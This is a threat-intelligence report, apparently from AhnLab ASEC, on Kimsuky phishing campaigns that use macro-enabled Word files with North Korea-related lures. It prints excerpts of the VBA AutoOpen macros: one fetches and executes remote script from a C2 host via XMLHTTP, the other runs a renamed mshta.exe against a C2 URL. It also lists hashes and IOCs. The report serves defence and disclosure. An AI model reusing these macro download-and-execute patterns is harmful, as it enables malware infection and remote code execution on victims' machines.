Word File Provided as External Link When Replying to Attacker’s Email (Kimsuky)

The ASEC analysis team has discovered the continuous distribution of malicious Word files with North Korea-related materials. The types of discovered Word files included the one discussed in the “Overall Organizational Analysis Report of 2021 Kimsuky Attack Word Files” (AhnLab TIP) and ‘Word Files Related to Diplomacy and National Defense Being Distributed‘. Also, there was also a type using mshta.

The malicious Word files are distributed in various names as shown below.

• CV of Kim **(Korean American Organization of **,220711).doc
• Yang**_** Foundation interim report(220716).doc
• Consultation Request.doc

 

• Type 1

The malicious Word file titled ‘Consultation Request.doc’ was most likely distributed through the email shown below. The attacker impersonated a person from a Korean organization to send an email requesting a consultation for a report.

 

The first attack email does not have any attachments. Only when a user responds favorably to the email does the attacker sends a reply with a URL for the user to download a malicious Word file.

 

 

Clicking the link on the second email will display a webpage containing another malicious URL.

 

Clicking the download button will redirect the user to hxxps://accounts.serviceprotect[.]eu/signin/v2/identifier?hl=kr&passive=true&<omitted>rtnurl=aHR0cHM6Ly9kb2NzLmdv<omitted>. The URL cannot be currently accessed. Yet judging from the URL, it is likely that it collected login information of users and downloaded a malicious Word file from the rtnurl parameter value.

Opening the Word file will show an image asking users to enable macros by clicking the Enable Content button. If users comply, the file displays texts related to a consultation request, making it difficult to realize its malicious features.

 

 

The file contains a VBA macro that connects to a certain URL. Here are some parts of the macro code below.

Sub <strong>Reserve</strong>(pth)
    Documents.Add
    cnt = "On Error Resume Next:Set mx = CreateObje" & "ct(""Microsoft.XMLHTTP""):mx.open ""GET"", ""hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"

Sub <strong>AutoOpen</strong>()
    On Error Resume Next
    pw = "1qaz2wsx"
    Weed pw

    obt = "winmgmts:win32_process"
Set wm = <strong>GetObject</strong>(obt)
        pth = <strong>Templates</strong>(1).Path & "\version.ini"
        cd = "wscript.exe //e:vbscript //b"
wm.Create cd & pth

End Sub

 

When the macro is run, it creates version.ini in the AppData\Roaming\Microsoft\Templates folder. It then runs the created ini file through wscript.exe.

• wscript.exe //e:vbscript //b %AppData%\Microsoft\Templates\version.ini

On Error Resume Next:Set mx = CreateObject("Microsoft.XMLHTTP"):mx.open "GET", "hxxp://asssambly.mywebcommunity[.]org/file/upload/list.php?query=1", False:mx.Send:Execute(mx.responseText)

version.ini

 

As the URL cannot be currently accessed, it is impossible to know what the macro does after. It likely engaged in malicious behaviors such as leaking user PC information as mentioned in the previous post ‘Word Document Attack Targeting Companies Specialized in Carbon Emissions‘.

• Type 2

Type 2 is distributed with a file related to a specific webinar and accesses C2 through mshta. Similar to Type 1, the Word file shows an image prompting users to enable macros. If users do so, the file shows a following text related to the webinar with a topic of North Korea.

 

The file also contains a VBA macro, which is shown below.

Sub <strong>AutoOpen</strong>()

jsfds = "cmd /c copy %windir%\system32\mshta.exe %tmp%\gtfmon.exe"
Shell jsfds, 0

jsfds = "cmd /c timeout /t 7 >NUL && %tmp%\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php"
Shell jsfds, 0

End Sub

 

When the macro is run, it copies mshta.exe in the TEMP folder as gtfmon.exe and attempts to access a certain URL using the cmd command.

• cmd /c timeout /t 7 >NUL && %tmp%\gtfmon.exe hxxp://freunkown1.sportsontheweb[.]net/h.php

Again, the URL cannot be currently accessed and further behaviors cannot be confirmed. Similar to Type 1, the macro likely performed malicious behaviors such as leaking user PC information.

As malicious Word files containing North Korea-related materials are continuously being discovered, users need to take caution. Since attackers are distributing malicious files by impersonating normal users, one should check the email address of the sender and take caution when opening attachments and clicking links.

[File Detection]
Downloader/DOC.Kimsuky

 

MD5

357ef37979b02b08120895ae5175eb0a

7fe055d5aa72bd50470da61985e12a8a

URL

http[:]//asssambly[.]mywebcommunity[.]org/file/upload/list[.]php?query=1

http[:]//freunkown1[.]sportsontheweb[.]net/h[.]php